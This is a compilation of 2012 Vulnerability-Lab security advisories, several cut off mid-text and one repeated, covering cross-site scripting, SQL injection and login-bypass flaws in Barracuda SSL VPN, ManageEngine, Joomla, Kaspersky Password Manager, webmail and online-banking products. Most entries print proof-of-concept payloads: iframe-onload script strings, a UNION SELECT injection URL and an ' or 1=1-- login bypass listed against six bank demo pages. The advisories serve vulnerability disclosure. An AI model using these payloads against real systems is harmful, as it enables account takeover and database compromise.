Barracuda Appliances - Validation Filter Bypass Vulnerability
in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities
Title: == Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities Date: = 2012-07-16 References: === http://vulnerability-lab.com/get_content.php?id=561 Barracuda Networks Security ID: BNSEC-278 VL-ID: = 561 Common Vulnerability Scoring System: 3 Introduction: = The Barracuda SSL VPN is an integrated hardware and software solution enabling secure, clientless remote access to internal network resources from any Web browser. Designed for remote employees and road warriors, the Barracuda SSL VPN provides comprehensive control over file systems and Web-based applications requiring external access. The Barracuda SSL VPN integrates with third-party authentication mechanisms to control user access levels and provides single sign-on. Barracuda SSL VPN * Enables access to corporate intranets, file systems or other Web-based applications * Tracks resource access through auditing and reporting facilities * Scans uploaded files for viruses and malware * Leverages multi-factor, layered authentication mechanisms, including RSA SecurID and VASCO tokens * Integrates with existing Active Directory and LDAP directories * Utilizes policies for granular access control framework * Supports any Web browser on PC or Mac (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/sslvpn.php) Abstract: = The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Barracuda SSL VPN 680 appliance application. Report-Timeline: 2012-06-09: Researcher Notification Coordination 2012-06-10: Vendor Notification 2012-07-12: Vendor Response/Feedback 2012-07-14: Vendor Fix/Patch 2012-07-16: Public Disclosure Status: Published Affected Products: == Barracuda Networks Product: SSL VPN Appliance v680 - 2.2.2.115 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple non persistent cross site scripting vulnerabilities are detected in Barracuda SSL VPN 680 v2.2.2.115 appliance application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required user inter action. The bugs are located in the fileSystem.do, showUserResourceCategories.do,launchAgent.do files with the bound vulnerable policyLaunching, resourcePrefix, path return-To parameters. Successful exploitation can result in account steal, phishing client-side content request manipulation. Vulnerable Module(s): [+] showUserResourceCategories.domessageResourcesKey=resourceCategory [+] fileSystem.do?launchId=l52ca6dactionTarget=listpath= [+] launchAgent.do Vulnerable Parameter(s): [+] policyLaunching resourcePrefix [+] listpath [+] return-To Proof of Concept: = The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user inter action. For demonstration or reproduce ... 1.1 https://sslvpn.[SERVER]/resourceList.do?form=resourceCategoriesFormreadOnly=testpath= %2FshowUserResourceCategories.domessageResourcesKey=resourceCategoryactionPath=[NON-PERSISTENT SCRIPT CODE!] 1.2 https://sslvpn.[SERVER]/[FILE].do?[VALUE #1]=l52ca6d[VALUE #2]=[VALUE #3][PATH LISTING]=smb/Sales%20Folder/Opt/[NON-PERSISTENT SCRIPT CODE!] PoC: https://sslvpn.[SERVER]/fileSystem.do?launchId=l52ca6dactionTarget=listpath=smb/Sales%20Folder/Testing %20from%20Tri%20Opt/%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C 1.3 https://sslvpn.[SERVER]/launchAgent.do?launchId=l3ce418returnTo=[NON-PERSISTENT SCRIPT CODE!] Solution: = 2012-07-14: Vendor Fix/Patch by Barracuda Networks Risk: = The security risk of the non-persistent cross site scripting vulnerabilities are estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any
ME Application Manager 10 - Multiple Web Vulnerabilities
=showdetailsresourcename=DNS+monitorviewType=showResourceTypes http://appmanager.127.0.0.1:1338/jsp/ThresholdActionConfiguration.jsp?resourceid=1055attributeIDs=101 attributeToSelect=101%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3Credirectto=/common/serverinfo.do http://appmanager.127.0.0.1:1338/ProcessTemplates.do?method=createProcessTemplatetemplatetype=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C Risk: = 1.1 The security risk of the blind sql vulnerabilities are estimated as high. 1.2 The security risk of the non persistent cross site scripting vulnerabilities are estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [storm] (st...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Distimo Monitor 6.0 - Multiple Cross Site Vulnerabilities
(+)|(-)medium. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
ME Mobile Application Manager v10 - SQL Vulnerabilities
Title: == ME Mobile Application Manager v10 - SQL Vulnerabilities Date: = 2012-07-04 References: === http://www.vulnerability-lab.com/get_content.php?id=628 VL-ID: = 628 Common Vulnerability Scoring System: 8.1 Introduction: = ManageEngine Mobile Applications Manager is a server and application performance monitoring software that helps businesses ensure high availability and performance for their business applications by ensuring servers and applications have high uptime. The application performance management capability includes server monitoring, application server monitoring, database monitoring, web services monitoring, virtualization monitoring, cloud monitoring and an array of other application management capability that will help IT administrators manage their resources effectively. Note: The mobile version 10 is compatible with Blackberry, Iphone Android smartphones with IE, Safari or Firefox browser. (Copy of the Vendor Homepage: http://www.manageengine.com/products/applications_manager ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple SQL Injection Vulnerabilities in Manage Engines Mobile Application Manager v10. Report-Timeline: 2012-06-23: Public or Non-Public Disclosure Status: Published Affected Products: == Manage Engine Product: Mobile Application Manager v10.0 Exploitation-Technique: === Remote Severity: = Critical Details: Multiple SQL Injection vulnerabilities are detected in Manage Engines Mobile Application Manager v10. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms without user inter action. The vulnerabilities are located in the DetailsView.do or Search.do module(s) and the bound vulnerable parameters showMGDetailsgroupId viewName. Successful exploitation of the vulnerabilities result in dbms application compromise via sql injection attack. Vulnerable Module(s): [+] DetailsView.do [+] Search.do Vulnerable Parameter(s): [+] showMGDetailsgroupId [+] viewName Proof of Concept: = The sql injection vulnerabilities in the mobile manager application can be exploited by remote attackers without user inter action. For demonstration or reproduce ... PoC: http://appmanager.127.0.0.1:1339/mobile/DetailsView.do?method=showMGDetailsgroupId=10003645+UnION+ SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+ WHERE+table_schema=database()--%20- http://appmanager.127.0.0.1:1339/mobile/Search.do?method=mobileSearch requestid=[SQL INJECTION]mobileSearchPageviewName=Search Risk: = The security risk of the sql injection vulnerabilities are estimated as high. Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [storm] (st...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
Kaspersky PM 5.0.0.164 - Software Filter Vulnerability
RoleValues RoleValue ID=118 RoleType=37/ RoleValue ID=119 RoleType=38/ RoleValue ID=120 RoleType=39/ RoleValue ID=121 RoleType=40/ RoleValue ID=122 RoleType=41/ RoleValue ID=123 RoleType=42/ RoleValue ID=124 RoleType=43/ RoleValue ID=125 RoleType=44/ RoleValue ID=126 RoleType=45/ RoleValue ID=127 RoleType=46/ /RoleValues /CreditCard /CreditCards BankAccounts BankAccount Name=[PERSISTENt INJECTED SCRIPT CODE]) ID=128 ParentID=62/ BankAccount Name= ID=129 ParentID=62 RoleValues RoleValue ID=130 RoleType=47/ RoleValue ID=131 RoleType=48/ RoleValue ID=132 RoleType=49/ RoleValue ID=133 RoleType=50/ RoleValue ID=134 RoleType=51/ RoleValue ID=135 RoleType=52/ RoleValue ID=136 RoleType=53/ RoleValue ID=137 RoleType=54/ RoleValue ID=138 RoleType=55/ RoleValue ID=139 RoleType=56/ /RoleValues /BankAccount /BankAccounts /Identity /Identities /Database /root Solution: = XML special characters in Item names need to be encoded when processing to export as HTML file. Risk: = The security risk of the persistent software vulnerability is estimated as low(+)/(-)medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Kaspersky Password Manager 5.0.0.164 - Software Filter Vulnerability
RoleValues RoleValue ID=118 RoleType=37/ RoleValue ID=119 RoleType=38/ RoleValue ID=120 RoleType=39/ RoleValue ID=121 RoleType=40/ RoleValue ID=122 RoleType=41/ RoleValue ID=123 RoleType=42/ RoleValue ID=124 RoleType=43/ RoleValue ID=125 RoleType=44/ RoleValue ID=126 RoleType=45/ RoleValue ID=127 RoleType=46/ /RoleValues /CreditCard /CreditCards BankAccounts BankAccount Name=[PERSISTENt INJECTED SCRIPT CODE]) ID=128 ParentID=62/ BankAccount Name= ID=129 ParentID=62 RoleValues RoleValue ID=130 RoleType=47/ RoleValue ID=131 RoleType=48/ RoleValue ID=132 RoleType=49/ RoleValue ID=133 RoleType=50/ RoleValue ID=134 RoleType=51/ RoleValue ID=135 RoleType=52/ RoleValue ID=136 RoleType=53/ RoleValue ID=137 RoleType=54/ RoleValue ID=138 RoleType=55/ RoleValue ID=139 RoleType=56/ /RoleValues /BankAccount /BankAccounts /Identity /Identities /Database /root Solution: = XML special characters in Item names need to be encoded when processing to export as HTML file. Risk: = The security risk of the persistent software vulnerability is estimated as low(+)/(-)medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY ADMINISTRATION CONTACT: ad...@vulnerability-lab.com
Joomla com_package - SQL Injection Vulnerability
Title: == Joomla com_package - SQL Injection Vulnerability Date: = 2012-07-08 References: === http://www.vulnerability-lab.com/get_content.php?id=652 VL-ID: = 652 Common Vulnerability Scoring System: 8.3 Introduction: = Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. As of November 2011, there are over 8,600 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla) Abstract: = A Vulnerability-Lab researcher discovered a SQL injection vulnerability in the com_package module of the joomla CMS. Report-Timeline: 2012-07-08: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: A SQL Injection vulnerability is detected in the com_package module of the joomla Content Management System. Remote attackers low privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the com_package module with the bound vulnerable id parameter. Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise. Vulnerable Module(s): [+] index.php?option=com_package Vulnerable Parameter(s): [+] id Proof of Concept: = The SQL Injection vulnerabilities can be exploited by remote attackers without privileged user account or required user inter action. For demonstration or reproduce ... PoC: Path: / File: index.php Module: ?option=com_package Parameter: detailsid=-1'[SQL Injection]-- URL: http://www.xxx.com/index.php?option=com_packagetask=detailsid=174-1'[SQL Injection]-- Risk: = The security risk of the remote SQL Injection vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Chokri Ben Achor (meis...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission
iAuto Mobile Application 2012 - Multiple Web Vulnerabilities
%3Ciframe+src%3Dhttp%3A%2F%2Fvuln-lab.com+ width%3D1000+height%3D900+onload%3Dalert%28%22VulnerabilityLab%22%29+%3CState[equal]=11action=search Browse by Make and Model / AC Cobra / PoC: http://iauto.xxx.com/iAuto/m/browse-by-make-model/AC+Cobra/%22%3E%3Ciframe%20src=http://vuln-lab.com%20 width=1000%20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3C/ Comments Reply to The Comment Topic Text (commentSid) PoC: http://iauto.xxx.com/iAuto/m/comment/add/?listingSid=448commentSid=%22%3E%3Ciframe%20src=http://vuln-lab.com%20width=1000 %20height=900%20onload=alert%28%22VulnerabilityLab%22%29%20%3CreturnBackUri=%2Flisting%2Fcomments%2F448%2F%3F Risk: = 1.1 The security risk of the persistent input validation vulnerability is estimated as medium(+). 1.2 The security risk of the non-persistent cross site scripting vulnerabilities are estimated as low(+)|(-)medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Inout Mobile Webmail APP - Multiple Web Vulnerabilities
Title: == Inout Mobile Webmail APP - Multiple Web Vulnerabilities Date: = 2012-06-08 References: === http://www.vulnerability-lab.com/get_content.php?id=609 VL-ID: = 609 Common Vulnerability Scoring System: 3.5 Abstract: = The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the inoutscripts mobile Inoutmail Webmail CMS 2012. Report-Timeline: 2012-06-08: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the inoutscripts mobile Inoutmail CMS 2012. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action privileged user account. The persistent valiation vulnerabilities are located in the new mail contacts modules with the bound values to, bcc, cc. The bug can be exploited by remote attackers. The attacker is sending a malicious mail with vulnerable script code values as content. The admin or customer is watching the arriving mail and the persistent script code in To or Bcc inputs. The context will be executed (persistent) when the user,customer or admin is processing to check his mails. A privileged user account can also use the bug to save it persistent for higher privileged user account exploitation. Vulnerable Module(s): [+] New Mail [+] Contacts Vulnerable Parameter(s): [+] To [+] Cc [+] Bcc Proof of Concept: = The persistent vulnerabilities can be exploited by remote attackers with low required user inter action. For demonstration or reproduce ... Insert the demonstration string to the Bcc, Cc To of the send new mail. Secound possibility is to send a mail from outside to the inout webmail with the string code values. PoC: iframe src=http://vuln-lab.com onload=alert(VL) Risk: = The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] -snup (s...@vulnerability-lab.com [http://snup1.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability
Title: == BeneficialBank Business v4.13.1 - Auth Bypass Vulnerability Date: = 2012-07-09 References: === http://www.vulnerability-lab.com/get_content.php?id=654 VL-ID: = 654 Common Vulnerability Scoring System: 8.5 Abstract: = A Vulnerability-Lab researcher discovered an SQL injection vulnerability in the Beneficial Bank Business Banking v4.13.1 CMS. Report-Timeline: 2012-07-09: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: A Auth Bypass vulnerability is detected in the Beneficial Bank Business Banking 4.13.1 Content Management System. Remote attackers without privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the login module with the bound vulnerable Company ID Company Password parameters. Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise unauthorized web application (admin/customer) panel access. Vulnerable Section(s): [+] Login Vulnerable Parameter(s): [+] User Pass Proof of Concept: = The login auth bypass vulnerability can be exploited by remote attacker without privileged user account. For demonstration or reproduce ... PoC: user : ' or 1=1-- pass : ' or 1=1-- URL: http://www.thebeneficial-ebanking.com/customer_demo/index2.html https://www.frontrangebankonline.com/customer_demo/index2.html http://www.libertybaybank.com/customer_demo/index2.html http://www.fs-bankonline.com/customer_demo/index2.html http://www.centralstateonline.com/customer_demo/index2.html http://www.hvbonlinebanking.com/customer_demo/index2.html Risk: = The security risk of the auth bypass vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Chokri Ben Achor (meis...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab 